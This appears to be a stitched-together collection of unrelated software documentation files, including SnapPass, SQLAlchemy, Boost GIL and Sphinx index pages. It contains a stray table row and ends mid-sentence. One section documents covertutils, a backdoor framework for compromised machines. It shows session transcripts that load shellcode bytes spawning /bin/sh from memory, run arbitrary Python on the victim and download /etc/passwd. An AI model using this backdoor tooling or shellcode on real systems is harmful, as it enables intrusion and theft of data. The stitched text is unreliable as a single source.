"foo": "foo",
"bar": 3
}
Complex Shape
=============
Another common return shape is a nested object, contained inside a layer
with details about the response:
.. code-block:: json
{
"code": 200,
"success": true,
"result": {
"foo": "foo",
"bar": 3
}
}
This can be enabled by modifying the default context, or passing a
custom one into your function:
.. code-block:: python
from transmute_core import (
default_context, ResponseShapeComplex,
TransmuteContext
)
# modifying the global context, which should be done
# before any transmute functions are called.
default_context.response_shape = ResponseShapeComplex
# passing in a custom context
context = TransmuteContext(response_shape=ResponseShapeComplex)
transmute_route(app, fn, context=context)
Custom Shapes
=============
Any class or object which implements :class:`transmute_core.response_shape.ResponseShape`
can be used as an argument to response_shape.
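To make the difference between the two shapes concrete, here is a minimal, library-independent sketch of the wrapping that the complex shape performs. It does not reproduce transmute-core's actual ``ResponseShape`` interface, whose method names are not shown on this page:

```python
def simple_shape(result, code=200):
    """Default shape: the serialized object is the whole body."""
    return result

def complex_shape(result, code=200):
    """Complex shape: nest the object inside a metadata envelope."""
    return {"code": code, "success": 200 <= code < 300, "result": result}

body = complex_shape({"foo": "foo", "bar": 3})
print(body)
# {'code': 200, 'success': True, 'result': {'foo': 'foo', 'bar': 3}}
```

A custom shape implementation plugs the equivalent of this wrapping step into the framework so every route's output is enveloped consistently.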
Galactic Habitat
================
Overview
--------
=================== ============
**Date** 07/25/18
**Author** Russell Deitrick
**Modules** `galhabit <../src/galhabit.html>`_
**Approx. runtime** | 183 seconds (:code:`vpl.in`)
| 175 seconds (:code:`tides_only/vpl.in`)
**Source code** `GitHub <https://github.com/VirtualPlanetaryLaboratory/vplanet-private/tree/master/examples/galhabit>`_
=================== ============
.. todo:: **@deitrr**: Description needed for the **galh_test** example.
To run this example
-------------------
.. code-block:: bash
# Run the main example
vplanet vpl.in
# Run the `tides_only` example
cd tides_only
vplanet vpl.in
cd ..
# Plot the figure
python plotgalh.py
Expected output
---------------
.. todo:: **@deitrr**: Caption needed for the **galh_test** example figure.
.. figure:: galh_test.png
:width: 600px
:align: center
Product price factor
====================
Description: https://apps.odoo.com/apps/modules/11.0/product_price_factor/
Maintainers
-----------
* `IT-Projects LLC <https://it-projects.info>`__
This module is not maintained since Odoo 13.0
Tested on Odoo 11.0 51a9f30e1971155b6315c6bd888d56048191bddd
Youtube playlist addon
======================
A fresh install of VLC can read youtube videos but not playlists. This feature
can be added thanks to a Lua script to be copied in
``~/.local/share/vlc/lua/playlist/youtube_playlist.lua``.
On Windows the path is ``%APPDATA%\vlc\lua\playlist\``.
* Addon website: http://addons.videolan.org/content/show.php/?content=149909
* Lua script: http://addons.videolan.org/CONTENT/content-files/149909-playlist_youtube.lua
Fork Notes
----------
This repository was forked from pinterest/snappass to fix an issue with the shareable token links: all URLs not pointing to the base domain led to a "500 Internal Server Error" page when the app was deployed via cPanel's Application Manager (which uses Passenger).
This fork inserts the token into the URL as a query string instead, which resolves the issue.
Installation on WHM + cPanel + Apache
--------------------------------------
1. On cPanel, open Files -> Git Version Control -> Create
2. Create a Repository with these settings::

       Clone a Repository: ON
       Clone URL: https://github.com/mdelecate/snappass.git
       Repository Path: public_html/snappass/repo
       Repository Name: SnapPass

   Click Create.
3. Open Software -> Application Manager -> Register Application
4. Deploy the following Application::

       Application Name: SnapPass
       Deployment Domain: Pick your preferred domain
       Base Application URL: /
       Application Path: public_html/snappass/repo/snappass
       Deployment Environment: Production
       Environment Variables -> Add Variable:
           Variable Name: SECRET_KEY
           Value: a long random string of characters (use a random key/password generator)

   Click Deploy.
5. In the Application Manager, for the new SnapPass app, click "Ensure dependencies" to install all required software.
Done! Your app is now available on your preferred domain.
If there are problems, toggle Deployment Environment to Development to increase your chance of seeing helpful error messages.
It's strongly recommended to use a domain with an SSL certificate. WHM makes this easy with AutoSSL and Let's Encrypt.
It's strongly recommended to force a secure connection by going to cPanel -> Domains -> Force HTTPS Redirect.
/Fork Notes
-----------------
========
SnapPass
========
|pypi| |build|
.. |pypi| image:: https://img.shields.io/pypi/v/snappass.svg
:target: https://pypi.python.org/pypi/snappass
:alt: Latest version released on PyPI
.. |build| image:: https://travis-ci.org/pinterest/snappass.svg
:target: https://travis-ci.org/pinterest/snappass
:alt: Build status
It's like SnapChat... for passwords.
This is a web app that lets you share passwords securely.
Let's say you have a password. You want to give it to your coworker, Jane.
You could email it to her, but then it's in her email, which might be backed up,
and probably is in some storage device controlled by the NSA.
You could send it to her over chat, but chances are Jane logs all her messages
because she uses Google Hangouts Chat, and Google Hangouts Chat might log everything.
You could write it down, but you can't find a pen, and there's way too many
characters because your security person, Paul, is paranoid.
So we built SnapPass. It's not that complicated, it does one thing. If
Jane gets a link to the password and never looks at it, the password goes away.
If the NSA gets a hold of the link, and they look at the password... well they
have the password. Also, Jane can't get the password, but now Jane knows that
not only is someone looking in her email, they are clicking on links.
Anyway, this took us very little time to write, but we figure we'd save you the
trouble of writing it yourself, because maybe you are busy and have other things
to do. Enjoy.
Security
--------
Passwords are encrypted using `Fernet`_ symmetric encryption, from the `cryptography`_ library.
A random unique key is generated for each password, and is never stored;
it is rather sent as part of the password link.
This means that even if someone has access to the Redis store, the passwords are still safe.
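The one-time retrieval behaviour described above can be sketched as follows. A plain dictionary stands in for Redis, the encryption step is elided, and none of these names come from SnapPass itself:

```python
import secrets

store = {}  # stand-in for Redis; SnapPass stores an *encrypted* blob here

def share(secret: str) -> str:
    """Store the secret under a random token and return the token.

    In SnapPass the stored value is Fernet-encrypted, and the decryption
    key travels only inside the generated link, never into storage.
    """
    token = secrets.token_urlsafe(32)
    store[token] = secret
    return token

def retrieve(token: str):
    """Return the secret once; any later attempt gets None."""
    return store.pop(token, None)

token = share("hunter2")
print(retrieve(token))  # hunter2
print(retrieve(token))  # None -- the link is single-use
```

The pop-on-read step is what makes the link "disappear" after Jane (or anyone else) views it once.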
.. _Fernet: https://cryptography.io/en/latest/fernet/
.. _cryptography: https://cryptography.io/en/latest/
Requirements
------------
* Redis
* Python 2.7+ or 3.4+ (both included)
Installation
------------
::
$ pip install snappass
$ snappass
* Running on http://0.0.0.0:5000/
* Restarting with reloader
Configuration
-------------
You can configure the following via environment variables.
``SECRET_KEY``: unique key that's used to sign the password key. This should
be kept secret. See the `Flask Documentation`__ for more information.
.. __: http://flask.pocoo.org/docs/quickstart/#sessions
``DEBUG``: to run Flask web server in debug mode. See the `Flask Documentation`__ for more information.
.. __: http://flask.pocoo.org/docs/quickstart/#debug-mode
``STATIC_URL``: this should be the location of your static assets. You might not
need to change this.
``NO_SSL``: if you are not using SSL.
``URL_PREFIX``: useful when running snappass behind a reverse proxy like `nginx`. Example: ``"/some/path/"``, Defaults to ``None``
``REDIS_HOST``: this should be set by Redis, but you can override it if you want. Defaults to ``"localhost"``
``REDIS_PORT``: is the port redis is serving on, defaults to 6379
``SNAPPASS_REDIS_DB``: is the database that you want to use on this redis server. Defaults to db 0
``REDIS_URL``: (optional) will be used instead of ``REDIS_HOST``, ``REDIS_PORT``, and ``SNAPPASS_REDIS_DB`` to configure the Redis client object. For example: redis://username:password@localhost:6379/0
``REDIS_PREFIX``: (optional, defaults to ``"snappass"``) prefix used on redis keys to prevent collisions with other potential clients
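Putting a few of these together, a deployment might export something like the following environment configuration before starting the app. All values here are illustrative placeholders, not defaults:

```shell
# Illustrative environment for a SnapPass instance behind a reverse proxy.
export SECRET_KEY='change-me-to-a-long-random-string'
export REDIS_HOST='redis.internal'
export REDIS_PORT=6379
export SNAPPASS_REDIS_DB=0
export URL_PREFIX='/snappass/'
```

With these set, start the app with ``snappass`` as shown in the Installation section.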
Docker
------
Alternatively, you can use `Docker`_ and `Docker Compose`_ to install and run SnapPass:
.. _Docker: https://www.docker.com/
.. _Docker Compose: https://docs.docker.com/compose/
::
$ docker-compose up -d
This will pull all dependencies, i.e. Redis and appropriate Python version (3.7), then start up SnapPass and Redis server. SnapPass server is accessible at: http://localhost:5000
Similar Tools
-------------
- `Snappass.NET <https://github.com/generateui/Snappass.NET>`_ is a .NET
(ASP.NET Core) port of SnapPass.
We're Hiring!
-------------
Are you really excited about open-source and great software engineering?
`Pinterest is hiring <https://careers.pinterest.com>`_!
6. Strengths of the Movement
============================
This part of the strategy describes some of the strengths of the Open Knowledge movement and community.
**Organisational structure and collective impact**
* The global scientific community is vast, spanning every continent and embedded in research and academic institutions. The 'Open' movement is about more than just knowledge: it is linked to broader fields such as Open Culture, Open Government, Open Source, and Open Society. The potential collective impact of the movement is therefore enormous, with consequences for global society; for example, influencing the [UN Sustainable Development Goals](http://www.unfoundation.org/features/globalgoals/the-global-goals.html).
*see the [UN Sustainable Development Goals](https://www.un.org/sustainabledevelopment/sustainable-development-goals/) website*
* Open Knowledge activists, as part of the wider open movement, benefit greatly from cross-sector collaboration. For example, Open Knowledge currently serves as a gateway to Open Education, but enjoys stronger policy backing than the Open Source movement.
* **Diverse participation from passionate individuals**
* Significant successes in open knowledge are often attributed to persistent, tenacious champions, especially in the policy and advocacy/adoption arenas. These individuals show a remarkable ability to achieve substantial change, and to exert strong influence, almost single-handedly. As assets to the movement, they become even more valuable when their experience and knowledge can be shared and multiplied through collaboration, networks and communities, as well as mentoring models.
* **The strength of research and evidence supporting open knowledge practices**
* There is growing support for all aspects of Open Knowledge. Important summaries include [McKiernan et al., (2016)](https://elifesciences.org/articles/16800) and [Tennant et al., (2016)](https://f1000research.com/articles/5-632/v3). The impact can be seen at many levels, from individual practice up to national-level policies on Open Access and Open Science.
* Prominent projects, groups, and scholars have carried out research into many aspects of open knowledge and its impact, with largely positive results. As the movement grows, the evidence base and the depth of critical analysis continue to develop.
* **A breadth of creativity producing technical and sociotechnical solutions**
* For example, the green and gold routes to Open Access: the former concerns self-archiving, the latter publishing in open access journals. While some variations exist, these models generally transcend geographic, institutional, and sectoral differences.
* The growth and adoption of preprints as a way to share research faster and more transparently. In the last two years, this has led to a rapidly evolving [landscape](https://doi.org/10.31222/osf.io/796tu) around preprints, with technological innovation and community practices constantly adapting.
* **The availability of many Open Knowledge charters and declarations**
* A growing number now support openness (typically [Open Access](http://oad.simmons.edu/oadwiki/Declarations_in_support_of_OA)), and also [more broadly](http://tinyurl.com/scholcomm-charters), offering goals and actions that generate a great deal of thought and discussion.
* **Strong momentum for developing policy models**
A dynamic, broad blend of top-down (policy initiatives from funders, governments, and institutions) and bottom-up (grassroots) approaches. It remains important that the open knowledge agenda stays recognised at the highest political levels. The UK Science and Technology [Committee's inquiry into research integrity](https://www.parliament.uk/business/committees/committees-a-z/commons-select/science-and-technology-committee/news-parliament-2017/research-integrity3-evidence-17-19/) is an excellent example of this.
One problem with top-down policies is that bodies such as governments and funders demand that researchers comply with rules on data sharing, open code, and the like, yet do not always provide the necessary resources or structures. Bottom-up policies jointly codify best practice from existing scientific research communities and, compared with top-down approaches, are more often voluntary rather than mandatory. Evaluating the degree of alignment between top-down and bottom-up policies can help illustrate how the two approaches can better accommodate and promote Open Knowledge.
* **A diversity of goals allows progress on many fronts simultaneously**
* For example, the [Scientific Electronic Library Online](http://www.scielo.org/php/index.php?lang=en) (SciELO) has proven successful in Latin American countries, Portugal, and South Africa. Similarly, [Africa Journals Online](https://www.ajol.info/) (AJOL) is very well known in Africa.
* Open Knowledge has been recognised by international organisations active in research and education, and enjoys strong support from institutions around the world.
* Open Knowledge tends to use a common language (English) to ease understanding (although see below for why this is also a challenge).
**Accessibility, user-friendliness, and dissemination**
* The Open Knowledge movement publishes articles and resources that are typically free of charge, well indexed by Google and other search engines, easy to read on mobile devices, and quick to use graphics and multimedia to illustrate points. This helps the movement spread its ideas more widely and quickly than traditional publication methods allow.
* Practices such as the use of text-formatting platforms, well-formed document structure with clearly labelled headings, paragraphs, etc., and alt-text for images and descriptive information for graphics, videos, etc. not only help make information machine-readable for dissemination, but also make it accessible to people with access needs (see, for example, the basic accessibility guidelines provided by [UK Home Office Digital](https://github.com/UKHomeOffice/posters/blob/master/accessibility/dos-donts/posters_en-UK/accessibility-posters-set.pdf)).
.. source file: README.rst (dkirkby/bossdata, MIT)

========
bossdata
========
.. image:: https://travis-ci.org/dkirkby/bossdata.svg?branch=master
:target: https://travis-ci.org/dkirkby/bossdata
.. image:: https://img.shields.io/pypi/v/bossdata.svg
:target: https://pypi.python.org/pypi/bossdata
.. image:: https://readthedocs.org/projects/bossdata/badge/?version=latest
:target: http://bossdata.readthedocs.io/en/latest/?badge=latest
:alt: Documentation Status
A python package for working with `spectroscopic data
<http://www.sdss.org/dr12/spectro/spectro_basics/>`_ from the `Sloan Digital
Sky Survey <http://www.sdss.org>`_.
* Free software: MIT license
* Documentation: https://bossdata.readthedocs.org
* Releases: https://pypi.python.org/pypi/bossdata
* Code: https://github.com/dkirkby/bossdata
.. source file: Resources/doc/codeigniter.rst (CyrilleHugues/TheodoEvolutionLegacyWrapperBundle, MIT)

Wrap CodeIgniter
=================
Here is the basic configuration for a CodeIgniter application:
::
theodo_evolution_legacy_wrapper:
root_dir: %kernel.root_dir%/../legacy
class_loader_id: theodo_evolution_legacy_wrapper.autoload.codeigniter_class_loader
kernel:
id: theodo_evolution_legacy_wrapper.legacy_kernel.codeigniter
options:
environment: %kernel.environment%
version: '2.1.2'
core: false
| 29.411765 | 90 | 0.644 |
.. source file: covertutils/docs/stages.rst (aidden-laoch/sabre, MIT)
.. _stages_page:
Beyond the OS Shell
===================
The ``covertutils`` package has an API for creating custom stages that can be dynamically loaded to compromised machines.
If a :class:`covertutils.handlers.stageable.StageableHandler` is running on a pwned machine, stages can be pushed to it.
The API is fully documented in the :ref:`stage_api_page` page.
.. _pythonapi-stage:
The `Python` Stage
------------------
A Python shell with access to all internals is available.
The sent code runs directly in the `covertutils stage API`,
so it is able to access the ``storage`` and ``storage['COMMON']`` dictionaries and change internals objects at runtime.
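
The mechanism can be pictured (loosely — this is an illustration, not the actual covertutils internals) as ``exec()``-ing each received code block in a namespace that exposes the shared ``storage`` dictionary; the function and key names below are assumptions:

```python
# Hypothetical sketch of how a Python stage could evaluate received code with
# access to the agent's shared state; the real covertutils stage API may differ.
storage = {"COMMON": {"handler": None}, "on": True}

def run_python_stage(code_block: str, storage: dict) -> dict:
    # Execute the received block in a namespace that exposes `storage`,
    # so sent code can inspect and mutate the agent's internals at runtime.
    namespace = {"storage": storage}
    exec(code_block, namespace)
    return namespace

# An operator-sent snippet mutates the agent's shared dictionary in place:
run_python_stage("storage['COMMON']['note'] = 'set from operator'", storage)
```

Because the namespace shares the same ``storage`` object as the handler, changes made by sent code persist between stage invocations.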
.. code:: bash
(127.0.0.1:49550)>
(127.0.0.1:49550)>
Available Streams:
[ 0] - control
[ 1] - python
[ 2] - os-shell
[99] - EXIT
Select stream: 1
[python] >>>
[python] >>> print "Python module with access to the Stager API"
[python] >>> Python module with access to the Stager API
[python] >>> @
No special command specified!
Available special commands:
@clear
@show
@storage
@send
@pyload
[python] >>> @storage
[python] >>> {'COMMON': {'handler': <covertutils.handlers.impl.standardshell.StandardShellHandler object at 0x7f6d472c9490>},
'on': True,
'queue': <Queue.Queue instance at 0x7f6d47066b90>}
[python] >>> if "indentation is found" :
[python] ... print "The whole code block gets transmitted!"
[python] ...
[python] >>> The whole code block gets transmitted!
[python] >>>
[python] >>> print "@pyload command loads python files"
[python] >>> @pyload command loads python files
[python] >>> @pyload /tmp/pycode.py
Buffer cleared!
File '/tmp/pycode.py' loaded!
[python] >>> @show
====================
print "This code exists in a file"
====================
[python] >>>
[python] >>> This code exists in a file
[python] >>>
(127.0.0.1:49550)>
The `Shellcode` Stages
----------------------
When one can directly run stuff in a process, why not run some `shellcode` too?
And do it **directly from memory** please!
Running `shellcode` requires the following things:
- Acquiring the shellcode!
- Copying it to memory, to a known memory location
- Making that location executable at runtime
- ``jmp`` ing to that location
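
On Linux, those four steps can be sketched with ``ctypes`` and ``mmap`` roughly as follows. This is an illustration, not the actual stage implementation, and the payload here is a harmless single x86-64 ``ret`` instruction:

```python
import ctypes
import mmap

def load_shellcode(payload: bytes):
    """Copy `payload` into a readable/writable/executable page and return a
    C function pointer to it (Linux-only sketch, not the covertutils code)."""
    buf = mmap.mmap(-1, max(len(payload), mmap.PAGESIZE),
                    prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
    buf.write(payload)
    # Take the address of the buffer's first byte and cast it to void(void).
    addr = ctypes.addressof(ctypes.c_char.from_buffer(buf))
    return ctypes.CFUNCTYPE(None)(addr), buf  # keep `buf` alive with the pointer

# A harmless x86-64 payload: a single `ret` (0xC3) instruction.
runner, mem = load_shellcode(b"\xc3")
```

Calling ``runner()`` would jump into the mapped page; a real agent would receive the payload bytes over the covert channel rather than hard-coding them.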
So ``covertutils`` has 2 `stages` that utilize ``ctypes`` built-in package to do the right things and finally run `shellcode`!
They are located under :mod:`covertutils.payloads.linux.shellcode` and :mod:`covertutils.payloads.windows.shellcode`.
A `SubShell` is also available that translates copy-pasted `shellcodes` from various sources to raw data, before sending them over to a poor `Agent`.
.. code:: bash
(127.0.0.1:51038)> !stage mload covertutils.payloads.linux.shellcode
shellcode
(127.0.0.1:51038)>
Available Streams:
[ 0] - control
[ 1] - python
[ 2] - os-shell
[ 3] - shellcode
[ 4] - stage
[99] - EXIT
Select stream: 3
This shell will properly format shellcode
pasted from sources like "exploit-db.com" and "msfvenom"
[shellcode]>
[shellcode]>
[shellcode]> unsigned char code[]= \
Type 'GO' when done pasting...
[shellcode]> "\x6a\x66\x58\x99\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5e\x52"
Type 'GO' when done pasting...
[shellcode]> "\x66\x68\x11\x5c\x52\x6a\x02\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd"
Type 'GO' when done pasting...
[shellcode]> "\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93"
Type 'GO' when done pasting...
[shellcode]> "\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x2f\x2f\x73\x68\x68\x2f\x62"
Type 'GO' when done pasting...
[shellcode]> "\x69\x6e\x89\xe3\x50\x89\xe1\xb0\x0b\xcd\x80";
Type 'GO' when done pasting...
[shellcode]>
[shellcode]> GO
Type 'GO' when done pasting...
====================
Pasted lines:
unsigned char code[]= \
"\x6a\x66\x58\x99\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5e\x52"
"\x66\x68\x11\x5c\x52\x6a\x02\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd"
"\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93"
"\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x89\xe1\xb0\x0b\xcd\x80";
Length of 75 bytes
Shellcode in HEX :
6a6658995343536a0289e1cd805b5e526668115c526a026a10515089e1b066cd80894104b304b066cd8043b066cd809359b03fcd804979f9682f2f7368682f62696e89e35089e1b00bcd80
Shellcode in BINARY :
jfX�SCSj��̀[^Rfh\RjjQP���f̀�A��f̀C�f̀�Y�?̀Iy�h//shh/bin��P���
====================
Send the shellcode over? [y/N] y
[shellcode]>
* The `shellcode` used in the demo is taken from https://www.exploit-db.com/exploits/42254/
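
The normalization such a `SubShell` performs can be sketched as a small parser that collects every ``\xNN`` escape from the pasted text; the function below is an illustration, not the actual covertutils parser:

```python
import re

def parse_pasted_shellcode(lines):
    """Collect every \\xNN escape from pasted C-array / msfvenom output
    and return the raw payload bytes (a sketch, not the real parser)."""
    blob = "\n".join(lines)
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", blob))

# The first two pasted lines from the session above:
pasted = [
    "unsigned char code[]= \\",
    r'"\x6a\x66\x58\x99\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5e\x52"',
]
payload = parse_pasted_shellcode(pasted)
```

The resulting raw bytes can then be sent over the encrypted channel to the agent.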
Oh, and one more thing! `Shellcodes` do not need to be `Null Free` (of course!). String termination happens in Python, and they are transmitted **encrypted by design** anyway.
The `File` Stage
------------------
What good is a backdoor if you can't use it to **leak files**? Or even upload executables and that kind of stuff.
Actually, after the first smile when the pure `netcat reverse shell oneliner` returns, doing stuff with it becomes a pain really fast.
And the next step is trying to ``wget`` stuff with the non-tty shell, or copy-pasting `Base64 encoded` files from the screen.
Miserable things happen when there aren't specific commands for file upload/download to the compromised system. And out-of-band methods (`pastebin`, `wget`, etc) can easily be identified as abnormal...
The ``covertutils`` package has a `file` stage and subshell, to provide file transfers from the `Agent` to the `Handler` and vice-versa in an in-band manner (using the same `Communication Channel`).
.. code:: bash
(127.0.0.1:56402)>
Available Streams:
[ 0] - control
[ 1] - python
[ 2] - os-shell
[ 3] - file
[ 4] - stage
[99] - EXIT
Select stream: 3
=|file]> ~ help download
download <remote-file> [<location>]
=|file]> ~
=|file]> ~ download /etc/passwd
=|file]> ~ File downloaded!
=|file]> ~ download /etc/passwd renamed.txt
=|file]> ~ File downloaded!
=|file]> ~ help upload
upload <local-file> [<remote-location>]
=|file]> ~
=|file]> ~ upload /etc/passwd myusers
=|file]> ~ File uploaded succesfully!
=|file]> ~
=|file]> ~ upload /etc/passwd
=|file]> ~ File uploaded succesfully!
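
Conceptually, in-band transfer just means encoding and chunking the file so each piece fits the channel's message size. A rough sketch follows; the chunk size and function names are assumptions, not the real covertutils protocol, which also handles framing and compression:

```python
import base64
import os
import tempfile

CHUNK_SIZE = 1024  # assumed per-message capacity of the covert channel

def file_to_chunks(path):
    """Base64-encode a file and split it into channel-sized text chunks."""
    with open(path, "rb") as fh:
        encoded = base64.b64encode(fh.read()).decode("ascii")
    return [encoded[i:i + CHUNK_SIZE] for i in range(0, len(encoded), CHUNK_SIZE)]

def chunks_to_bytes(chunks):
    """Reassemble the chunks received on the other side of the channel."""
    return base64.b64decode("".join(chunks))

# Round-trip demo with a throwaway file standing in for /etc/passwd:
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"root:x:0:0::/root:/bin/sh\n" * 100)
    demo_path = tmp.name

chunks = file_to_chunks(demo_path)
restored = chunks_to_bytes(chunks)
os.unlink(demo_path)
```

Each chunk can then ride the existing encrypted channel and be reassembled on the receiving side with ``chunks_to_bytes()``.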
.. warning:: Providing file transfer `in-band` is a double-edged sword.
If the `Communication Channel` is a TCP connection then files will flow around nicely (taking also advantage of the embedded compression, see: :ref:`compressor_component` ).
But if the `Communication Channel` is a `covert TCP backdoor` or such `super-low-bandwidth` channel, a 1MB file will `take forever to download`, taking over the whole channel. An out-of-band approach should be considered in this case.
.. warning:: Transfer of files can trigger the :class:`StreamIdentifier`'s `Birthday Problem` (TODO: document it) destroying 1 or more `streams` (the `control stream` should still work to ``!control reset`` the connection). For heavy use of file transferring, a bigger ``tag_length`` should be used on the :class:`Orchestrator` passed to the :class:`Handler` object.
.. source file: docs/source/elliot/elliot.evaluation.metrics.coverage.num_retrieved.rst (gategill/elliot, Apache-2.0)

elliot.evaluation.metrics.coverage.num\_retrieved package
=========================================================
Submodules
----------
elliot.evaluation.metrics.coverage.num\_retrieved.num\_retrieved module
-----------------------------------------------------------------------
.. automodule:: elliot.evaluation.metrics.coverage.num_retrieved.num_retrieved
:members:
:undoc-members:
:show-inheritance:
Module contents
---------------
.. automodule:: elliot.evaluation.metrics.coverage.num_retrieved
:members:
:undoc-members:
:show-inheritance:
.. source file: about.rst (Cuder/elevator-guide, MIT)

About DenvEL-4500
=================
DenvEL-4500 is a modern high-speed passenger elevator. It carries people between floors of a public or residential building.
DenvEL-4500 consists of two main components:
* The car—a cabin for passengers
* The hoistway—a shaft in which the car moves up and down
.. toctree::
:maxdepth: 2
:caption: In this section
technical-characteristics
why
entrance
car
control-panel
.. source file: docs/source/index.rst (rlluo1/SET, NASA-1.3)

.. Skyglow documentation master file, created by
sphinx-quickstart on Fri Jun 30 20:51:36 2017.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
==============================
**Skyglow Estimation Toolbox**
==============================
*Current Version: v0.0.1*
.. figure:: _static/website_image.png
:scale: 25%
:align: right
:figwidth: 500
*Summer 2017 Wyoming Cross-Cutting II Team Website Image. Teton Range, WY, displayed below a processed artificial skyglow map around Grand Teton National Park, generated from a nine-month composite image.*
Skyglow is the brightening of the sky caused by various illuminated sources, including anthropogenic lighting, atmospheric factors, and celestial light. With the unprecedented growth of urbanization, artificial lighting has been rapidly increasing the brightness of the night sky around the world. This problem has attracted serious concerns from researchers, scientists, and communities to address the ramifications of what is now known as light pollution.
Previously the impact of light pollution on sky brightness was measured by handheld Sky Quality Meters and observations from the Defense Meteorological Satellite Program (DMSP) Operational Linescan System. Both have observational flaws: the Sky Quality Meter is limited in range and feasibility, the DMSP sensor in resolution.
To refine these measurements, the Wyoming Cross-Cutting team at the NASA DEVELOP National Program created the Skyglow Estimation Toolbox (SET) in partnership with the National Park Service and Wyoming Stargazing. The Toolbox is written in Python 2.7 and takes satellite measurements from NASA and NOAA's Suomi National Polar-orbiting Partnership (NPP) Visible Infrared Imaging Radiometer Suite (VIIRS) satellite sensor to map images of skyglow using local parameters. Researchers using the Toolbox can identify sources of light pollution with far greater precision by factoring in light scattering at different viewing angles and apply SET's propagation model to varying locations.
All the Toolbox's user and developer documentation can be found on this website. End-users can refer to the navigation bar's "Index" at the top of the page to find information on installing, running, and generating skyglow maps. Likewise, developers looking to contribute to the documentation or program can find guidelines through the index. Thank you for visiting!
.. figure:: _static/suominpp.png
:scale: 35%
:align: right
**Contents**
------------
.. toctree::
:maxdepth: 2
overview
usr/installation
usr/tutorial
method
.. toctree::
:maxdepth: 2
dev/dev
dev/site
.. toctree::
:maxdepth: 2
trouble/faq
trouble/contact
.. source file: doc/index.rst (harsh-4/gil, BSL-1.0)

Boost Generic Image Library
===========================
The Generic Image Library (GIL) is a C++11 header-only library that abstracts image
representations from algorithms and allows writing code that can work on
a variety of images with performance similar to hand-writing for a specific
image type.
Quickstart
----------
.. toctree::
:maxdepth: 1
installation
tutorial/video
tutorial/histogram
tutorial/gradient
naming
Core Library Documentation
--------------------------
.. toctree::
:maxdepth: 2
design/index
image_processing/index
API Reference <./reference/index.html#://>
Extensions Documentation
------------------------
.. toctree::
:maxdepth: 2
io
toolbox
numeric
Examples
--------
* :download:`x_gradient.cpp <../example/x_gradient.cpp>`:
Writing an algorithm that operates on generic images
* :download:`dynamic_image.cpp <../example/dynamic_image.cpp>`:
Using images whose properties (color space, channel type) are specified
at run time
* :download:`histogram.cpp <../example/histogram.cpp>`: Creating a histogram
* :download:`interleaved_ptr.cpp <../example/interleaved_ptr.cpp>`,
:download:`interleaved_ptr.hpp <../example/interleaved_ptr.hpp>`,
:download:`interleaved_ref.hpp <../example/interleaved_ref.hpp>`:
Creating your own pixel reference and pixel iterator
* :download:`mandelbrot.cpp <../example/mandelbrot.cpp>`:
Creating a synthetic image defined by a function
* :download:`packed_pixel.cpp <../example/packed_pixel.cpp>`:
Defining bitmasks and images whose channels or pixels are not byte-aligned
* :download:`resize.cpp <../example/resize.cpp>`:
Rescaling an image using bilinear sampling (requires the optional
Numeric extension)
* :download:`affine.cpp <../example/affine.cpp>`:
Applying an affine transformation to an image (requires the optional
Numeric extension)
* :download:`convolution.cpp <../example/convolution.cpp>`:
Blurring images (requires the optional Numeric extension)
.. source file: docs generated for statsmodels (BSD-3-Clause)

statsmodels.tsa.regime\_switching.markov\_autoregression.MarkovAutoregression.param\_names
==========================================================================================
.. currentmodule:: statsmodels.tsa.regime_switching.markov_autoregression
.. autoproperty:: MarkovAutoregression.param_names

.. source file: doc/build/faq/ormconfiguration.rst (sqlalchemy, MIT)

ORM Configuration
=================
.. contents::
:local:
:class: faq
:backlinks: none
.. _faq_mapper_primary_key:
How do I map a table that has no primary key?
---------------------------------------------
The SQLAlchemy ORM, in order to map to a particular table, needs there to be
at least one column denoted as a primary key column; multiple-column,
i.e. composite, primary keys are of course entirely feasible as well. These
columns do **not** need to be actually known to the database as primary key
columns, though it's a good idea that they are. It's only necessary that the columns
*behave* as a primary key does, e.g. as a unique and not nullable identifier
for a row.
Most ORMs require that objects have some kind of primary key defined
because the object in memory must correspond to a uniquely identifiable
row in the database table; at the very least, this allows the
object to be targeted for UPDATE and DELETE statements which will affect only
that object's row and no other. However, the importance of the primary key
goes far beyond that. In SQLAlchemy, all ORM-mapped objects are at all times
linked uniquely within a :class:`.Session`
to their specific database row using a pattern called the :term:`identity map`,
a pattern that's central to the unit of work system employed by SQLAlchemy,
and is also key to the most common (and not-so-common) patterns of ORM usage.
.. note::
It's important to note that we're only talking about the SQLAlchemy ORM; an
application which builds on Core and deals only with :class:`_schema.Table` objects,
:func:`_expression.select` constructs and the like, **does not** need any primary key
to be present on or associated with a table in any way (though again, in SQL, all tables
should really have some kind of primary key, lest you need to actually
update or delete specific rows).
In almost all cases, a table does have a so-called :term:`candidate key`, which is a column or series
of columns that uniquely identify a row. If a table truly doesn't have this, and has actual
fully duplicate rows, the table does not correspond to `first normal form <https://en.wikipedia.org/wiki/First_normal_form>`_ and cannot be mapped.   Otherwise, whatever columns comprise the best candidate key can be
applied directly to the mapper::
class SomeClass(Base):
__table__ = some_table_with_no_pk
__mapper_args__ = {
'primary_key':[some_table_with_no_pk.c.uid, some_table_with_no_pk.c.bar]
}
Better yet is when using fully declared table metadata, use the ``primary_key=True``
flag on those columns::
class SomeClass(Base):
__tablename__ = "some_table_with_no_pk"
uid = Column(Integer, primary_key=True)
bar = Column(String, primary_key=True)
All tables in a relational database should have primary keys. Even a many-to-many
association table - the primary key would be the composite of the two association
columns::
CREATE TABLE my_association (
user_id INTEGER REFERENCES user(id),
account_id INTEGER REFERENCES account(id),
PRIMARY KEY (user_id, account_id)
)
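
For reference, the same association table can be declared in SQLAlchemy Core by marking both columns with ``primary_key=True``, mirroring the DDL above:

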